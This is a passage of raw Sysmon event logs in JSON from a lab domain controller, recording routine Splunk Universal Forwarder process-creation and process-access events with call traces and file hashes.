Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3464,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.827\r\nProcessGuid: {41C8662E-1FF5-5F25-0000-0010197B0500}\r\nProcessId: 4832\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nParentProcessId: 2364\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.827","ProcessGuid":"{41C8662E-1FF5-5F25-0000-0010197B0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1FF4-5F25-0000-0010596B0500}","ParentProcessId":"2364","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3465,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.814\r\nSourceProcessGUID: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nSourceProcessId: 2364\r\nSourceThreadId: 2176\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-0010197B0500}\r\nTargetProcessId: 4832\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+181c6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.814","SourceProcessGUID":"{41C8662E-1FF4-5F25-0000-0010596B0500}","SourceProcessId":"2364","SourceThreadId":"2176","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-0010197B0500}","TargetProcessId":"4832","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+181c6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3466,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.814\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-0010197B0500}\r\nTargetProcessId: 4832\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.814","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-0010197B0500}","TargetProcessId":"4832","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3467,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3468,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3469,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3470,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3471,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3472,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 